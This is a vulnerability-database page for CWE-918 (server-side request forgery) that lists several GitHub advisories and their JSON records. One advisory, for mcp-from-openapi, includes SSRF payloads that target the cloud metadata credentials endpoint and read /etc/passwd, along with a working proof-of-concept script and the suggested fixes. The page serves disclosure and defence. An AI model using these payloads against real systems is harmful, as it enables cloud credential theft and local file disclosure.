CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4638 vulnerabilities reference this CWE, most recent first.
GHSA-V6HG-MV73-76VG
Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-24 21:31Server-Side Request Forgery (SSRF) vulnerability in Burhan Nasir Smart Auto Upload Images smart-auto-upload-images allows Server Side Request Forgery.This issue affects Smart Auto Upload Images: from n/a through <= 1.2.2.
{
"affected": [],
"aliases": [
"CVE-2026-23803"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-19T09:16:13Z",
"severity": "MODERATE"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in Burhan Nasir Smart Auto Upload Images smart-auto-upload-images allows Server Side Request Forgery.This issue affects Smart Auto Upload Images: from n/a through \u003c= 1.2.2.",
"id": "GHSA-v6hg-mv73-76vg",
"modified": "2026-02-24T21:31:32Z",
"published": "2026-02-19T18:31:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23803"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/smart-auto-upload-images/vulnerability/wordpress-smart-auto-upload-images-plugin-1-2-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V6PH-XCQ9-QXXJ
Vulnerability from github – Published: 2026-04-08 19:22 – Updated: 2026-04-09 14:29Summary
The mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.
Affected Versions
<= 2.1.2 (latest)
CWE
CWE-918: Server-Side Request Forgery (SSRF)
Vulnerability Details
File: index.js lines 870-875
When OpenAPIToolGenerator.initialize() is called, it dereferences the OpenAPI document using json-schema-ref-parser:
this.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(
JSON.parse(JSON.stringify(this.document))
);
No options are passed to .dereference() — no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in $ref values, including:
http://andhttps://URLs (internal services, cloud metadata)file://URLs (local filesystem)
This is the default behavior of json-schema-ref-parser — it resolves all $ref pointers by fetching the referenced resource.
Exploitation
Attack 1: SSRF to internal services / cloud metadata
A malicious OpenAPI spec containing:
{
"openapi": "3.0.0",
"info": { "title": "Evil API", "version": "1.0" },
"paths": {
"/test": {
"get": {
"operationId": "getTest",
"summary": "test",
"responses": {
"200": {
"description": "OK",
"content": {
"application/json": {
"schema": {
"$ref": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}
}
}
}
}
}
}
}
}
When processed by OpenAPIToolGenerator, the library fetches http://169.254.169.254/latest/meta-data/iam/security-credentials/ from the server, potentially leaking AWS IAM credentials.
Attack 2: Local file read
{
"$ref": "file:///etc/passwd"
}
The ref parser reads local files and includes their contents in the dereferenced output.
Proof of Concept
const http = require('http');
const { OpenAPIToolGenerator } = require('mcp-from-openapi');
// Start attacker server to prove SSRF
const srv = http.createServer((req, res) => {
console.log(`SSRF HIT: ${req.method} ${req.url}`);
res.writeHead(200, {'Content-Type': 'application/json'});
res.end('{"type":"string"}');
});
srv.listen(9997, async () => {
const spec = {
openapi: '3.0.0',
info: { title: 'Evil', version: '1.0' },
paths: {
'/test': {
get: {
operationId: 'getTest',
summary: 'test',
responses: {
'200': {
description: 'OK',
content: {
'application/json': {
schema: { '$ref': 'http://127.0.0.1:9997/ssrf-proof' }
}
}
}
}
}
}
}
};
const gen = new OpenAPIToolGenerator(spec, { validate: false });
await gen.initialize();
// Output: "SSRF HIT: GET /ssrf-proof"
// The library fetched our attacker URL during $ref dereferencing.
srv.close();
});
Tested and confirmed on mcp-from-openapi v2.1.2. The attacker server receives the GET request during initialize().
Impact
- Cloud credential theft —
$refpointing tohttp://169.254.169.254/steals AWS/GCP/Azure metadata - Internal network scanning —
$refvalues can probe internal services and ports - Local file read —
file://protocol reads arbitrary files from the server filesystem - No privileges required — attacker only needs to provide a crafted OpenAPI spec to any application using this library
Suggested Fix
Pass resolver options to dereference() that restrict which protocols and hosts are allowed:
this.dereferencedDocument = await $RefParser.dereference(
JSON.parse(JSON.stringify(this.document)),
{
resolve: {
file: false, // Disable file:// protocol
http: {
// Only allow same-origin or explicitly allowed hosts
headers: this.options.headers,
timeout: this.options.timeout,
}
}
}
);
Or disable all external resolution and require all schemas to be inline:
this.dereferencedDocument = await $RefParser.dereference(
JSON.parse(JSON.stringify(this.document)),
{
resolve: { file: false, http: false, https: false }
}
);
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.1.2"
},
"package": {
"ecosystem": "npm",
"name": "mcp-from-openapi"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.0.3"
},
"package": {
"ecosystem": "npm",
"name": "@frontmcp/sdk"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.0.3"
},
"package": {
"ecosystem": "npm",
"name": "@frontmcp/adapters"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-39885"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-08T19:22:53Z",
"nvd_published_at": "2026-04-08T21:17:00Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe `mcp-from-openapi` library uses `@apidevtools/json-schema-ref-parser` to dereference `$ref` pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing `$ref` values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the `initialize()` call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.\n\n\n## Affected Versions\n\n`\u003c= 2.1.2` (latest)\n\n## CWE\n\nCWE-918: Server-Side Request Forgery (SSRF)\n\n## Vulnerability Details\n\n**File:** `index.js` lines 870-875\n\nWhen `OpenAPIToolGenerator.initialize()` is called, it dereferences the OpenAPI document using `json-schema-ref-parser`:\n\n```javascript\nthis.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(\n JSON.parse(JSON.stringify(this.document))\n);\n```\n\nNo options are passed to `.dereference()` \u2014 no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in `$ref` values, including:\n\n- `http://` and `https://` URLs (internal services, cloud metadata)\n- `file://` URLs (local filesystem)\n\nThis is the default behavior of `json-schema-ref-parser` \u2014 it resolves all `$ref` pointers by fetching the referenced resource.\n\n## Exploitation\n\n### Attack 1: SSRF to internal services / cloud metadata\n\nA malicious OpenAPI spec containing:\n\n```json\n{\n \"openapi\": \"3.0.0\",\n \"info\": { \"title\": \"Evil API\", \"version\": \"1.0\" },\n \"paths\": {\n \"/test\": {\n \"get\": {\n \"operationId\": \"getTest\",\n \"summary\": \"test\",\n \"responses\": {\n \"200\": {\n \"description\": \"OK\",\n \"content\": {\n \"application/json\": {\n \"schema\": {\n \"$ref\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"\n }\n }\n }\n }\n }\n }\n }\n }\n}\n```\n\nWhen processed by `OpenAPIToolGenerator`, the library fetches `http://169.254.169.254/latest/meta-data/iam/security-credentials/` from the server, potentially leaking AWS IAM credentials.\n\n### Attack 2: Local file read\n\n```json\n{\n \"$ref\": \"file:///etc/passwd\"\n}\n```\n\nThe ref parser reads local files and includes their contents in the dereferenced output.\n\n## Proof of Concept\n\n```javascript\nconst http = require(\u0027http\u0027);\nconst { OpenAPIToolGenerator } = require(\u0027mcp-from-openapi\u0027);\n\n// Start attacker server to prove SSRF\nconst srv = http.createServer((req, res) =\u003e {\n console.log(`SSRF HIT: ${req.method} ${req.url}`);\n res.writeHead(200, {\u0027Content-Type\u0027: \u0027application/json\u0027});\n res.end(\u0027{\"type\":\"string\"}\u0027);\n});\n\nsrv.listen(9997, async () =\u003e {\n const spec = {\n openapi: \u00273.0.0\u0027,\n info: { title: \u0027Evil\u0027, version: \u00271.0\u0027 },\n paths: {\n \u0027/test\u0027: {\n get: {\n operationId: \u0027getTest\u0027,\n summary: \u0027test\u0027,\n responses: {\n \u0027200\u0027: {\n description: \u0027OK\u0027,\n content: {\n \u0027application/json\u0027: {\n schema: { \u0027$ref\u0027: \u0027http://127.0.0.1:9997/ssrf-proof\u0027 }\n }\n }\n }\n }\n }\n }\n }\n };\n\n const gen = new OpenAPIToolGenerator(spec, { validate: false });\n await gen.initialize();\n // Output: \"SSRF HIT: GET /ssrf-proof\"\n // The library fetched our attacker URL during $ref dereferencing.\n\n srv.close();\n});\n```\n\n**Tested and confirmed** on mcp-from-openapi v2.1.2. The attacker server receives the GET request during `initialize()`.\n\n## Impact\n\n- **Cloud credential theft** \u2014 `$ref` pointing to `http://169.254.169.254/` steals AWS/GCP/Azure metadata\n- **Internal network scanning** \u2014 `$ref` values can probe internal services and ports\n- **Local file read** \u2014 `file://` protocol reads arbitrary files from the server filesystem\n- **No privileges required** \u2014 attacker only needs to provide a crafted OpenAPI spec to any application using this library\n\n## Suggested Fix\n\nPass resolver options to `dereference()` that restrict which protocols and hosts are allowed:\n\n```javascript\nthis.dereferencedDocument = await $RefParser.dereference(\n JSON.parse(JSON.stringify(this.document)),\n {\n resolve: {\n file: false, // Disable file:// protocol\n http: {\n // Only allow same-origin or explicitly allowed hosts\n headers: this.options.headers,\n timeout: this.options.timeout,\n }\n }\n }\n);\n```\n\nOr disable all external resolution and require all schemas to be inline:\n\n```javascript\nthis.dereferencedDocument = await $RefParser.dereference(\n JSON.parse(JSON.stringify(this.document)),\n {\n resolve: { file: false, http: false, https: false }\n }\n);\n```",
"id": "GHSA-v6ph-xcq9-qxxj",
"modified": "2026-04-09T14:29:54Z",
"published": "2026-04-08T19:22:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39885"
},
{
"type": "PACKAGE",
"url": "https://github.com/agentfront/frontmcp"
},
{
"type": "WEB",
"url": "https://github.com/agentfront/frontmcp/releases/tag/v1.0.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "mcp-from-openapi is Vulnerable to SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications"
}
GHSA-V6VR-JVVR-P4M5
Vulnerability from github – Published: 2022-08-11 00:00 – Updated: 2022-08-13 00:00Server-Side Request Forgery (SSRF) in GitHub repository kareadita/kavita prior to 0.5.4.1.
{
"affected": [],
"aliases": [
"CVE-2022-2756"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-10T16:15:00Z",
"severity": "MODERATE"
},
"details": "Server-Side Request Forgery (SSRF) in GitHub repository kareadita/kavita prior to 0.5.4.1.",
"id": "GHSA-v6vr-jvvr-p4m5",
"modified": "2022-08-13T00:00:26Z",
"published": "2022-08-11T00:00:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2756"
},
{
"type": "WEB",
"url": "https://github.com/kareadita/kavita/commit/9c31f7e7c81b919923cb2e3857439ec0d16243e4"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/95e7c181-9d80-4428-aebf-687ac55a9216"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V73R-F3CX-PM99
Vulnerability from github – Published: 2023-12-16 12:30 – Updated: 2023-12-16 12:30A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220.
{
"affected": [],
"aliases": [
"CVE-2023-6852"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-12-16T12:15:07Z",
"severity": "MODERATE"
},
"details": "A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220.",
"id": "GHSA-v73r-f3cx-pm99",
"modified": "2023-12-16T12:30:16Z",
"published": "2023-12-16T12:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6852"
},
{
"type": "WEB",
"url": "https://github.com/kalcaddle/KodExplorer/commit/5cf233f7556b442100cf67b5e92d57ceabb126c6"
},
{
"type": "WEB",
"url": "https://github.com/kalcaddle/KodExplorer/releases/tag/4.52.01"
},
{
"type": "WEB",
"url": "https://note.zhaoj.in/share/P6lQNyqQn3zY"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.248220"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.248220"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-V746-9WXC-9RC8
Vulnerability from github – Published: 2025-05-07 15:31 – Updated: 2026-04-01 18:35Server-Side Request Forgery (SSRF) vulnerability in solacewp Solace Extra allows Server Side Request Forgery. This issue affects Solace Extra: from n/a through 1.3.1.
{
"affected": [],
"aliases": [
"CVE-2025-47464"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-07T15:16:00Z",
"severity": "MODERATE"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in solacewp Solace Extra allows Server Side Request Forgery. This issue affects Solace Extra: from n/a through 1.3.1.",
"id": "GHSA-v746-9wxc-9rc8",
"modified": "2026-04-01T18:35:01Z",
"published": "2025-05-07T15:31:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47464"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/solace-extra/vulnerability/wordpress-solace-extra-1-3-1-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V77M-X7VQ-CW6F
Vulnerability from github – Published: 2025-03-03 06:30 – Updated: 2025-03-03 06:30A vulnerability classified as critical was found in zj1983 zz up to 2024-8. Affected by this vulnerability is an unknown functionality of the file /import_data_todb. The manipulation of the argument url leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2025-1849"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-03T04:15:08Z",
"severity": "MODERATE"
},
"details": "A vulnerability classified as critical was found in zj1983 zz up to 2024-8. Affected by this vulnerability is an unknown functionality of the file /import_data_todb. The manipulation of the argument url leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-v77m-x7vq-cw6f",
"modified": "2025-03-03T06:30:34Z",
"published": "2025-03-03T06:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1849"
},
{
"type": "WEB",
"url": "https://github.com/caigo8/CVE-md/blob/main/zz/zz_import_data_todb_SSRF.md"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.298117"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.298117"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.505346"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-V78R-CHCJ-PP8V
Vulnerability from github – Published: 2024-07-22 12:30 – Updated: 2024-07-22 12:30Server-Side Request Forgery (SSRF) vulnerability in Berqier Ltd BerqWP.This issue affects BerqWP: from n/a through 1.7.5.
{
"affected": [],
"aliases": [
"CVE-2024-37942"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-22T11:15:02Z",
"severity": "HIGH"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in Berqier Ltd BerqWP.This issue affects BerqWP: from n/a through 1.7.5.",
"id": "GHSA-v78r-chcj-pp8v",
"modified": "2024-07-22T12:30:37Z",
"published": "2024-07-22T12:30:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37942"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/searchpro/wordpress-berqwp-plugin-1-7-5-unauthenticated-non-blind-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V79F-2PH6-GVM9
Vulnerability from github – Published: 2026-04-27 00:30 – Updated: 2026-04-27 00:30A vulnerability has been found in BidingCC BuildingAI up to 26.0.1. Impacted is the function uploadRemoteFile of the file packages/core/src/modules/upload/services/file-storage.service.ts of the component Remote Upload API. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
{
"affected": [],
"aliases": [
"CVE-2026-7065"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-27T00:16:20Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been found in BidingCC BuildingAI up to 26.0.1. Impacted is the function uploadRemoteFile of the file packages/core/src/modules/upload/services/file-storage.service.ts of the component Remote Upload API. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.",
"id": "GHSA-v79f-2ph6-gvm9",
"modified": "2026-04-27T00:30:27Z",
"published": "2026-04-27T00:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7065"
},
{
"type": "WEB",
"url": "https://github.com/BidingCC/BuildingAI/issues/110"
},
{
"type": "WEB",
"url": "https://github.com/BidingCC/BuildingAI"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/798621"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/359640"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/359640/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-V7GR-MQPJ-WWH3
Vulnerability from github – Published: 2024-08-09 18:21 – Updated: 2024-08-12 16:01The proxy endpoint of openHAB's CometVisu add-on can be accessed without authentication. This proxy-feature can be exploited as Server-Side Request Forgery (SSRF) to induce GET HTTP requests to internal-only servers, in case openHAB is exposed in a non-private network.
Furthermore, this proxy-feature can also be exploited as a Cross-Site Scripting (XSS) vulnerability, as an attacker is able to re-route a request to their server and return a page with malicious JavaScript code. Since the browser receives this data directly from the openHAB CometVisu UI, this JavaScript code will be executed with the origin of the CometVisu UI. This allows an attacker to exploit call endpoints on an openHAB server even if the openHAB server is located in a private network. (e.g. by sending an openHAB admin a link that proxies malicious JavaScript.)
This vulnerability was discovered with the help of CodeQL's Server-side request forgery query.
Impact
This issue may lead up to Remote Code Execution (RCE) when chained with other vulnerabilities (see: GHSL-2024-007).
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.0"
},
"package": {
"ecosystem": "Maven",
"name": "org.openhab.ui.bundles:org.openhab.ui.cometvisu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-42467"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-09T18:21:07Z",
"nvd_published_at": "2024-08-12T13:38:34Z",
"severity": "HIGH"
},
"details": "The [proxy endpoint](https://github.com/openhab/openhab-webui/blob/1c03c60f84388b9d7da0231df2d4ebb1e17d3fcf/bundles/org.openhab.ui.cometvisu/src/main/java/org/openhab/ui/cometvisu/internal/backend/rest/ProxyResource.java#L83) of openHAB\u0027s CometVisu add-on can be accessed without authentication. This proxy-feature can be exploited as Server-Side Request Forgery (SSRF) to induce GET HTTP requests to internal-only servers, in case openHAB is exposed in a non-private network.\n\nFurthermore, this proxy-feature can also be exploited as a Cross-Site Scripting (XSS) vulnerability, as an attacker is able to re-route a request to their server and return a page with malicious JavaScript code. Since the browser receives this data directly from the openHAB CometVisu UI, this JavaScript code will be executed with the origin of the CometVisu UI. This allows an attacker to exploit call endpoints on an openHAB server even if the openHAB server is located in a private network. (e.g. by sending an openHAB admin a link that proxies malicious JavaScript.)\n\nThis vulnerability was discovered with the help of CodeQL\u0027s [Server-side request forgery](https://codeql.github.com/codeql-query-help/java/java-ssrf/) query.\n\n## Impact\n\nThis issue may lead up to Remote Code Execution (RCE) when chained with other vulnerabilities (see: GHSL-2024-007).",
"id": "GHSA-v7gr-mqpj-wwh3",
"modified": "2024-08-12T16:01:01Z",
"published": "2024-08-09T18:21:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openhab/openhab-webui/security/advisories/GHSA-v7gr-mqpj-wwh3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42467"
},
{
"type": "WEB",
"url": "https://github.com/openhab/openhab-webui/commit/630e8525835c698cf58856aa43782d92b18087f2"
},
{
"type": "PACKAGE",
"url": "https://github.com/openhab/openhab-webui"
},
{
"type": "WEB",
"url": "https://github.com/openhab/openhab-webui/blob/1c03c60f84388b9d7da0231df2d4ebb1e17d3fcf/bundles/org.openhab.ui.cometvisu/src/main/java/org/openhab/ui/cometvisu/internal/backend/rest/ProxyResource.java#L83"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
"type": "CVSS_V4"
}
],
"summary": "CometVisu Backend for openHAB affected by SSRF/XSS"
}
GHSA-V7Q5-M92R-6WC2
Vulnerability from github – Published: 2023-08-01 15:30 – Updated: 2024-04-04 06:28rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
{
"affected": [],
"aliases": [
"CVE-2023-39109"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-08-01T14:15:10Z",
"severity": "HIGH"
},
"details": "rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.",
"id": "GHSA-v7q5-m92r-6wc2",
"modified": "2024-04-04T06:28:15Z",
"published": "2023-08-01T15:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39109"
},
{
"type": "WEB",
"url": "https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_a.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.